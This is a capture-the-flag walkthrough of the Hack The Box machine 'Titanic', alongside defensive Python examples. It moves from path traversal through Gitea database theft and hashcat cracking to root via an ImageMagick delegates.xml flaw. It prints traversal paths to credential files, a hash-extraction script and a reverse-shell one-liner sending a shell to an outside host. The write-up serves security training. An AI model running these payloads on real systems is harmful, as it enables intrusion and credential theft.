HTB: Titanic

Summary

Titanic is an easy box that exposes a simple website and a Gitea instance. The website is an application that allows users to enter information for a Titanic ticket and then download it. However, when downloading the ticket, the application does not properly sanitize the file path, leading to a path traversal vulnerability that allows reading arbitrary files from the system.

Additionally, a Gitea instance is available, allowing user registration. By signing up, we gain access to a repository containing a docker-compose file that reveals the file path of Gitea’s data storage. Using this information, we can dump the SQLite database, extract a user’s password hash, crack it, and use it to SSH into the box.

On the target system, we discover a root-owned script that runs every minute and calls a vulnerable version of ImageMagick. This vulnerability allows us to execute arbitrary commands and escalate to root.


Initial Access

An initial nmap scan reveals that ports 22 and 80 are open:

Nmap scan report for 10.129.137.253
Host is up (0.031s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 73:03:9c:76:eb:04:f1:fe:c9:e9:80:44:9c:7f:13:46 (ECDSA)
|_  256 d5:bd:1d:5e:9a:86:1c:eb:88:63:4d:5f:88:4b:7e:04 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://titanic.htb/
Service Info: Host: titanic.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap done: 1 IP address (1 host up) scanned in 23.53 seconds.

The scan indicates that the webserver’s hostname is titanic.htb. We add this to our /etc/hosts file to resolve the domain locally.

Upon visiting titanic.htb in Burp Suite’s built-in browser, we find a simple website that allows users to book Titanic tickets. After submitting a ticket, we receive a JSON download of the ticket.

Path Traversal Vulnerability

Examining the request in Burp Suite, we see that the /download endpoint is called with a ticket parameter that specifies the file path. Sending the request to Burp Repeater and replacing the ticket value with a relative path containing ../ sequences confirms a path traversal vulnerability: the application returns the contents of arbitrary files from the server.

More details on this type of vulnerability can be found here: OWASP Path Traversal.
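The following is an added example (not code from the box or from this post) of the flawed pattern behind this kind of download endpoint, side by side with a hardened resolver. The ticket directory name is an assumption; the real application's path is not shown here. The containment check follows symlinks with realpath() and uses commonpath() so that a sibling directory with a shared prefix is not accepted either.

```python
import os

# Assumed ticket storage directory (hypothetical; the box's real path is not given).
TICKET_DIR = "/srv/tickets-example"


def download_path_vulnerable(ticket: str, base_dir: str = TICKET_DIR) -> str:
    """The flawed pattern: the user-supplied ticket name is joined to the base
    directory with no validation, so '../' sequences or an absolute path walk
    straight out of base_dir. Normalising does not help; it only tidies the result."""
    return os.path.normpath(os.path.join(base_dir, ticket))


def download_path_safe(ticket: str, base_dir: str = TICKET_DIR) -> str:
    """Hardened version: resolve the final path (symlinks included) and require
    it to be a file strictly inside the resolved base directory.
    Raises ValueError on any traversal attempt."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, ticket))
    # commonpath() is the portable containment test; a bare startswith() would
    # also accept a sibling such as /srv/tickets-example-old.
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"rejected ticket path: {ticket!r}")
    return candidate


def classify(tickets, base_dir: str = TICKET_DIR) -> dict:
    """Run a batch of ticket values through the safe resolver and report which
    ones it accepts; useful as a regression check for the endpoint."""
    result = {}
    for t in tickets:
        try:
            download_path_safe(t, base_dir)
            result[t] = True
        except ValueError:
            result[t] = False
    return result


if __name__ == "__main__":
    samples = ["ticket-42.json", "../../../../etc/hosts", "/etc/hosts",
               "sub/../ticket-42.json", ""]
    for t, ok in classify(samples).items():
        print(f"{'ACCEPT' if ok else 'REJECT'}  {t!r}")
```

Note that the safe resolver also rejects the empty name (which would resolve to the directory itself) while still accepting a value like sub/../ticket-42.json that normalises to a file inside the store.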

By leveraging this vulnerability, we explore the system and find /etc/hosts, which reveals another hostname: dev.titanic.htb.

After adding dev.titanic.htb to our /etc/hosts file, we visit it in our browser and discover a Gitea instance.


Exploiting Gitea

After signing up on Gitea, we find that the developer user has a repository containing docker-compose files for MySQL and Gitea. The Gitea docker-compose.yml file reveals the data storage path:

version: '3'

services:
  gitea:
    image: gitea/gitea
    container_name: gitea
    ports:
      - "127.0.0.1:3000:3000"
      - "127.0.0.1:2222:22"  # Optional for SSH access
    volumes:
      - /home/developer/gitea/data:/data  # Data storage path
    environment:
      - USER_UID=1000
      - USER_GID=1000
    restart: always

To extract valuable information from Gitea, it’s useful to understand the layout of its data folder. Running this docker-compose file locally (after adjusting the mount path) shows where Gitea keeps its configuration inside the container. Since the volume maps /data in the container to /home/developer/gitea/data on the host, the configuration file is reachable through the path traversal at:

../../../../../../../../home/developer/gitea/data/gitea/conf/app.ini

This file reveals that Gitea uses an SQLite database, which we can download the same way:

../../../../../../../../home/developer/gitea/data/gitea/gitea.db

It’s recommended to download this file via a browser instead of Burp Repeater, since the database is a binary file and copying it out of Repeater’s response pane can corrupt it.

Extracting and Cracking the Hash

Once we have the database, we dump the password hashes using:

# Gitea stores both the PBKDF2 digest (passwd) and the salt as hex strings;
# hashcat's PBKDF2-HMAC-SHA256 format (mode 10900) expects them base64-encoded,
# with Gitea's default iteration count of 50000.
sqlite3 gitea.db "SELECT name, passwd, salt FROM user" | while read -r line; do
    salt="$(echo "$line" | awk -F'|' '{print $3}' | xxd -p -r | base64)"
    digest="$(echo "$line" | awk -F'|' '{print $2}' | xxd -p -r | base64)"
    username="$(echo "$line" | awk -F'|' '{print $1}')"
    echo "${username}:sha256:50000:${salt}:${digest}"
done
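As an added example (not the author's script), the same conversion in Python, with a helper that reproduces Gitea's default PBKDF2-HMAC-SHA256 hashing so the format rewrite can be checked against a known password before any time is spent on it. The database is a constructed in-memory stand-in for gitea.db with one user and a made-up password; the 50000 rounds and 50-byte key length are Gitea's defaults.

```python
import base64
import hashlib
import hmac
import sqlite3

# Gitea's default password hashing: PBKDF2-HMAC-SHA256, 50000 rounds, 50-byte key.
# Both the digest (passwd column) and the 16-byte salt are stored hex-encoded.
ITERATIONS = 50000
KEY_LEN = 50


def gitea_hash(password: str, salt: bytes) -> str:
    """Reproduce Gitea's stored passwd value (hex) for a password and raw salt."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS, KEY_LEN).hex()


def to_hashcat(name: str, passwd_hex: str, salt_hex: str) -> str:
    """Rewrite one user row into hashcat's PBKDF2-HMAC-SHA256 line (mode 10900):
    name:sha256:<iterations>:<base64 salt>:<base64 digest>."""
    salt_b64 = base64.b64encode(bytes.fromhex(salt_hex)).decode()
    digest_b64 = base64.b64encode(bytes.fromhex(passwd_hex)).decode()
    return f"{name}:sha256:{ITERATIONS}:{salt_b64}:{digest_b64}"


def verify(line: str, candidate: str) -> bool:
    """Check a single candidate password against a hashcat-format line."""
    _name, algo, iters, salt_b64, digest_b64 = line.split(":")
    digest = base64.b64decode(digest_b64)
    derived = hashlib.pbkdf2_hmac(algo, candidate.encode(),
                                  base64.b64decode(salt_b64), int(iters), len(digest))
    return hmac.compare_digest(derived, digest)


def build_demo_db() -> sqlite3.Connection:
    """Constructed stand-in for gitea.db: one user with a made-up password."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE user (name TEXT, passwd TEXT, salt TEXT)")
    salt = b"0123456789abcdef"  # constructed 16-byte salt
    con.execute("INSERT INTO user VALUES (?, ?, ?)",
                ("developer", gitea_hash("example-password", salt), salt.hex()))
    con.commit()
    return con


def dump_hashcat_lines(con: sqlite3.Connection) -> list:
    """Same query as the shell loop above, one hashcat line per user."""
    return [to_hashcat(n, p, s) for n, p, s in con.execute("SELECT name, passwd, salt FROM user")]


if __name__ == "__main__":
    for line in dump_hashcat_lines(build_demo_db()):
        print(line)
        print("  matches 'example-password':", verify(line, "example-password"))
```

The verify() step is the sanity check worth doing before cracking a real dump: if a known test account does not verify, the salt or digest encoding in the conversion is wrong, not the wordlist.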

This gives us the hash of the developer user. We then crack it using:

hashcat --user hash.txt /usr/share/wordlists/rockyou.txt

With the cracked password, we can SSH into the box.


Privilege Escalation (Developer to Root)

Exploring the filesystem, we find a script at /opt/scripts/identify_images.sh. Examining its contents, we see that it moves into the /opt/app/static/assets/images directory, clears a metadata file, finds all .jpg files, and passes them to ImageMagick for metadata extraction.

We infer that this script runs every minute from the modification time of /opt/app/static/assets/images/metadata.log, which matches the current minute; the file is owned by root, so the script runs with root privileges:

developer@titanic:/opt/scripts$ date
Mon Feb 17 01:18:04 AM UTC 2025
developer@titanic:/opt/scripts$ ls -l /opt/app/static/assets/images/metadata.log 
-rw-r----- 1 root developer 442 Feb 17 01:18 /opt/app/static/assets/images/metadata.log

Exploiting ImageMagick

Checking the installed version:

developer@titanic:/opt/scripts$ /usr/bin/magick -version
Version: ImageMagick 7.1.1-35 Q16-HDRI x86_64 1bfce2a62:20240713 https://imagemagick.org

A Google search for "ImageMagick 7.1.1-35 Q16-HDRI x86_64 poc" leads to this security advisory, which describes a vulnerability that allows arbitrary command execution by placing a crafted delegates.xml configuration file in the working directory from which ImageMagick is run.
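The condition that makes this exploitable is a privileged job running ImageMagick inside a directory that a lower-privileged user can write to. The following is an added example (not part of this post or of the box) of a small audit that flags that condition: it reports whether the working directory is group- or world-writable and whether any of ImageMagick's configuration file names are already present there and owned by someone other than the trusted user. The directory in demo() is constructed with tempfile to mirror the layout described above; the list of configuration file names is the set ImageMagick looks up along its configure path.

```python
import os
import stat
import tempfile

# Configuration files ImageMagick looks up along its configure path. If that
# path includes the working directory, any of these dropped beside the images
# is honoured, which is exactly what a planted delegates.xml relies on.
IM_CONFIG_FILES = {
    "colors.xml", "configure.xml", "delegates.xml", "locale.xml", "log.xml",
    "magic.xml", "mime.xml", "policy.xml", "thresholds.xml", "type.xml",
}


def audit_workdir(workdir: str, trusted_uid: int = 0) -> dict:
    """Report whether a directory that a privileged job processes images in
    could have ImageMagick configuration planted: who can write to it, and
    which config file names are already present and not owned by trusted_uid."""
    st = os.stat(workdir)
    report = {
        "dir_owner_uid": st.st_uid,
        "dir_writable_by_group_or_world": bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)),
        "config_files": [],
    }
    for name in sorted(os.listdir(workdir)):
        if name in IM_CONFIG_FILES:
            fst = os.stat(os.path.join(workdir, name))
            report["config_files"].append({
                "name": name,
                "owner_uid": fst.st_uid,
                "owned_by_trusted_user": fst.st_uid == trusted_uid,
            })
    # Either condition is enough to worry about: a writable directory means a
    # config file can be planted later; an untrusted config file means it already was.
    report["at_risk"] = report["dir_writable_by_group_or_world"] or any(
        not c["owned_by_trusted_user"] for c in report["config_files"])
    return report


def demo() -> dict:
    """Constructed scenario: a group-writable image directory with a
    delegates.xml sitting next to the photos the scheduled job will process."""
    with tempfile.TemporaryDirectory() as d:
        os.chmod(d, 0o770)
        for fname in ("ship.jpg", "deck.jpg", "delegates.xml"):
            open(os.path.join(d, fname), "w").close()
        return audit_workdir(d, trusted_uid=0)


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Pointing audit_workdir() at the directory a cron job runs magick in (here /opt/app/static/assets/images) gives a quick answer to whether the layout on this box, a root-owned script processing files in a developer-writable directory, exists on a system you maintain; the fix is to run the job in a directory only root can write to, or to pin ImageMagick's configuration location explicitly rather than letting it consult the working directory.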

We exploit this by creating a malicious delegates.xml file:

cd /opt/app/static/assets/images

cat << EOF > ./delegates.xml
<delegatemap><delegate xmlns="" decode="XML" command="/tmp/s.sh"/></delegatemap>
EOF

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.14.149 8888 >/tmp/f' > /tmp/s.sh && chmod +x /tmp/s.sh

Next, we create a file that triggers the exploit:

touch -- 'delegates.xml test.jpg'

Finally, we set up a listener to catch the reverse shell:

nc -lnvp 8888

And that’s it! We successfully gain root access.


Final Thoughts

This box demonstrates the importance of proper input validation, secure file permissions, and regular software updates. The path traversal vulnerability, exposed Gitea instance, and ImageMagick exploit highlight common security flaws that can lead to full system compromise.
